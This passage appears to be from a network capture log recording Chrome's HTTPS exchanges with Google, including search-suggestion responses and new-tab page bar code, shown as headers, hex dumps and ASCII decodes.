                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-pU07PemUoTZ-5NtAikWO2w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC124INData Raw: 31 31 63 37 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 65 76 65 72 61 6e 63 65 20 73 65 61 73 6f 6e 20 32 20 66 69 72 73 74 20 38 20 6d 69 6e 75 74 65 73 22 2c 22 63 6f 73 74 63 6f 20 70 6f 6c 69 73 68 20 73 61 75 73 61 67 65 20 64 69 73 63 6f 6e 74 69 6e 75 65 22 2c 22 6e 69 6e 74 65 6e 64 6f 20 73 77 69 74 63 68 20 32 20 63 6f 6e 73 6f 6c 65 22 2c 22 6e 62 61 20 6c 61
                                                                                                                                                                                                                                                              Data Ascii: 11c7)]}'["",["severance season 2 first 8 minutes","costco polish sausage discontinue","nintendo switch 2 console","nba la
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1390INData Raw: 6b 65 72 73 22 2c 22 77 69 6e 74 65 72 20 73 74 6f 72 6d 20 77 61 72 6e 69 6e 67 22 2c 22 61 75 72 6f 72 61 20 62 6f 72 65 61 6c 69 73 20 6e 6f 72 74 68 65 72 6e 20 6c 69 67 68 74 73 20 66 6f 72 65 63 61 73 74 22 2c 22 6b 65 76 69 6e 20 6d 63 63 61 6c 6c 69 73 74 65 72 22 2c 22 69 6e 64 69 61 6e 20 6f 63 65 61 6e 20 74 73 75 6e 61 6d 69 20 32 30 30 34 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75
                                                                                                                                                                                                                                                              Data Ascii: kers","winter storm warning","aurora borealis northern lights forecast","kevin mccallister","indian ocean tsunami 2004"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1390INData Raw: 4d 6e 70 49 51 33 52 52 61 43 74 6a 54 45 35 53 61 55 46 42 53 79 39 4e 54 6b 64 48 62 6a 56 7a 62 46 64 76 54 55 6c 6a 51 57 6c 30 62 31 56 4b 56 55 35 6e 52 6c 64 6a 52 57 63 76 4c 31 4a 6d 57 55 74 6c 63 30 4a 6c 4c 7a 6c 50 55 46 6c 34 62 6e 5a 79 52 55 35 6f 52 45 78 5a 5a 33 5a 56 53 6a 4a 53 63 55 6f 30 62 6e 5a 30 57 44 52 50 64 45 74 42 55 30 39 4b 53 56 52 68 53 6c 63 77 64 6b 63 31 63 6c 4a 53 63 32 39 4c 61 6c 64 42 5a 30 5a 42 4c 30 31 68 54 31 4a 55 56 30 39 69 4d 6b 34 30 53 46 42 71 4b 32 52 6c 62 54 41 33 4c 33 46 6f 57 46 56 72 4d 6c 4a 77 54 56 68 46 55 31 51 72 64 6b 56 33 52 44 4e 33 62 6c 49 7a 54 30 56 68 61 7a 41 33 56 6a 64 49 56 79 74 6a 5a 56 68 50 5a 54 6c 55 4d 32 46 53 4e 6b 74 6d 4f 54 4e 6c 63 55 38 79 52 58 46 30 55 57 52
                                                                                                                                                                                                                                                              Data Ascii: MnpIQ3RRaCtjTE5SaUFBSy9NTkdHbjVzbFdvTUljQWl0b1VKVU5nRldjRWcvL1JmWUtlc0JlLzlPUFl4bnZyRU5oRExZZ3ZVSjJScUo0bnZ0WDRPdEtBU09KSVRhSlcwdkc1clJSc29LaldBZ0ZBL01hT1JUV09iMk40SFBqK2RlbTA3L3FoWFVrMlJwTVhFU1QrdkV3RDN3blIzT0VhazA3VjdIVytjZVhPZTlUM2FSNktmOTNlcU8yRXF0UWR
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1390INData Raw: 6c 57 52 32 68 48 4b 33 6c 56 52 6e 56 36 57 6a 63 30 62 47 4a 49 4c 7a 64 77 61 6b 46 30 59 6d 39 4e 64 32 38 31 62 57 30 35 62 44 4e 4b 4e 58 6b 35 64 44 4d 34 5a 6b 67 77 53 57 4d 33 57 6a 51 34 4e 6e 68 30 62 6c 4e 69 53 69 39 7a 55 44 6c 7a 4f 45 74 69 65 45 51 30 65 47 35 69 52 47 74 4b 54 45 64 36 5a 45 46 42 51 55 46 42 52 57 78 47 56 47 74 54 64 56 46 74 51 30 4d 36 43 6d 35 69 59 53 42 73 59 57 74 6c 63 6e 4e 4b 42 79 4d 35 4f 54 63 77 4d 54 68 53 4d 6d 64 7a 58 33 4e 7a 63 44 31 6c 53 6e 70 71 4e 48 52 45 55 44 46 55 5a 6b 6c 35 63 7a 41 79 54 6a 4a 45 4d 44 52 7a 63 45 78 54 62 46 52 4a 55 32 4e 34 54 30 78 54 62 30 64 42 52 57 78 77 51 6e 51 34 63 41 63 5c 75 30 30 33 64 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30
                                                                                                                                                                                                                                                              Data Ascii: lWR2hHK3lVRnV6Wjc0bGJILzdwakF0Ym9Nd281bW05bDNKNXk5dDM4ZkgwSWM3WjQ4Nnh0blNiSi9zUDlzOEtieEQ0eG5iRGtKTEd6ZEFBQUFBRWxGVGtTdVFtQ0M6Cm5iYSBsYWtlcnNKByM5OTcwMThSMmdzX3NzcD1lSnpqNHREUDFUZkl5czAyTjJEMDRzcExTbFRJU2N4T0xTb0dBRWxwQnQ4cAc\u003d","zl":10002},{"zl":1000
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC265INData Raw: 6e 52 50 61 47 6f 77 64 6e 6f 34 63 6e 64 79 52 6a 41 35 61 6e 52 59 53 46 4a 76 65 45 64 52 53 6a 41 35 53 6b 55 78 54 30 78 54 61 30 64 58 4e 45 74 48 64 33 4e 52 55 6e 5a 35 4e 53 39 36 57 58 68 36 62 57 4e 61 56 32 6b 78 55 6d 78 48 62 57 70 71 4e 47 78 6f 54 53 74 7a 63 6d 46 58 57 46 4a 35 5a 33 68 74 56 47 64 6e 56 57 30 78 61 48 56 6c 64 6d 74 79 52 30 4a 6a 61 6d 4a 77 51 6d 56 6b 55 6c 5a 7a 62 46 6c 44 64 33 4e 4a 4d 45 52 4d 54 58 68 44 51 32 6c 46 52 6b 56 4a 59 32 4a 48 4e 6d 52 54 4e 47 31 58 56 33 70 45 5a 6d 4a 74 55 6b 46 6a 63 32 55 30 5a 6b 5a 4b 4d 56 4a 48 62 46 70 70 64 56 6c 4b 64 55 6c 57 54 6b 56 50 52 6b 70 76 63 56 59 72 52 6e 56 71 54 33 6f 79 54 6e 4a 74 4d 30 73 30 53 55 6c 6f 56 31 56 75 56 6b 64 73 61 58 68 34 5a 6d 31 76
                                                                                                                                                                                                                                                              Data Ascii: nRPaGowdno4cndyRjA5anRYSFJveEdRSjA5SkUxT0xTa0dXNEtHd3NRUnZ5NS96WXh6bWNaV2kxUmxHbWpqNGxoTStzcmFXWFJ5Z3htVGdnVW0xaHVldmtyR0JjamJwQmVkUlZzbFlDd3NJMERMTXhDQ2lFRkVJY2JHNmRTNG1XV3pEZmJtUkFjc2U0ZkZKMVJHbFppdVlKdUlWTkVPRkpvcVYrRnVqT3oyTnJtM0s0SUloV1VuVkdsaXh4Zm1v
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC91INData Raw: 35 35 0d 0a 61 47 5a 46 57 55 6b 7a 52 31 4a 79 64 48 52 69 64 57 64 30 4e 6d 4a 43 4c 32 31 4d 65 43 74 6b 53 56 52 75 64 55 31 6e 4e 7a 51 77 62 30 74 49 54 58 68 4f 53 6a 4e 43 4d 55 4e 34 61 44 42 55 63 47 35 77 56 30 52 44 4e 6d 74 46 5a 55 6c 70 53 45 52 4e 55 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 55aGZFWUkzR1JydHRidWd0NmJCL21MeCtkSVRudU1nNzQwb0tITXhOSjNCMUN4aDBUcG5wV0RDNmtFZUlpSERNU
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1390INData Raw: 36 39 39 0d 0a 57 64 4e 4e 58 64 36 64 6d 68 58 56 6b 46 70 56 6d 35 46 62 6c 5a 56 64 32 46 72 63 44 56 4f 64 46 5a 32 52 54 4d 31 51 30 4a 36 65 58 68 6f 63 47 70 32 51 7a 68 43 62 44 52 73 54 31 56 6b 53 6d 52 35 53 7a 68 68 4e 31 64 6a 56 33 68 4c 63 32 78 74 61 58 42 4b 52 6b 70 55 65 58 52 34 53 31 6b 34 55 58 70 44 55 6d 4a 6b 63 6b 51 30 52 6e 5a 6c 52 6d 4e 74 56 31 56 78 4e 30 63 78 64 79 39 6f 5a 55 4e 51 54 6b 64 57 64 43 74 32 56 44 4a 48 52 54 4e 30 53 48 68 59 61 55 63 77 62 57 78 73 65 6e 42 32 59 30 78 78 61 44 4d 35 61 57 56 6a 56 6c 56 77 59 6c 70 6c 57 47 67 76 52 48 68 75 52 30 35 32 59 6b 4a 6d 54 57 56 4d 4e 48 4a 71 4d 48 4e 49 52 57 45 35 4e 57 6c 78 5a 46 64 73 5a 30 46 76 64 44 56 45 59 55 78 33 62 6c 56 30 4e 30 74 6a 56 48 64
                                                                                                                                                                                                                                                              Data Ascii: 699WdNNXd6dmhXVkFpVm5FblZVd2FrcDVOdFZ2RTM1Q0J6eXhocGp2QzhCbDRsT1VkSmR5SzhhN1djV3hLc2xtaXBKRkpUeXR4S1k4UXpDUmJkckQ0RnZlRmNtV1VxN0cxdy9oZUNQTkdWdCt2VDJHRTN0SHhYaUcwbWxsenB2Y0xxaDM5aWVjVlVwYlplWGgvRHhuR052YkJmTWVMNHJqMHNIRWE5NWlxZFdsZ0FvdDVEYUx3blV0N0tjVHd
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC306INData Raw: 64 22 3a 38 36 30 39 37 34 30 35 32 38 39 38 34 36 30 32 34 39 31 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 37 2c 31 32 35 36 2c 31 32 35 35 2c 31 32 35 34 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55
                                                                                                                                                                                                                                                              Data Ascii: d":8609740528984602491,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["QUERY","QUERY","QU
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              9192.168.2.449753172.217.21.364433844C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:09:46 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:09:47 GMT
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC372INData Raw: 31 37 65 36 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                              Data Ascii: 17e6)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                              Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                              Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                              Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                              Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC194INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 33 33 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700333,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC235INData Raw: 65 35 0d 0a 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 78 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: e5_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.xd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.
                                                                                                                                                                                                                                                              2024-12-27 06:09:47 UTC1390INData Raw: 38 30 30 30 0d 0a 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 62 2e 61 74 74 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 79 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c
                                                                                                                                                                                                                                                              Data Ascii: 8000dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.addEventListener(c,d,!1):b\u0026\u0026b.attachEvent?b.attachEvent(\"on\"+c,d):a.o.log(Error(\"B`\"+b))}};\n}catch(e){_._DumpException(e)}\ntry{\nvar yd\u003ddocument.querySelector(\
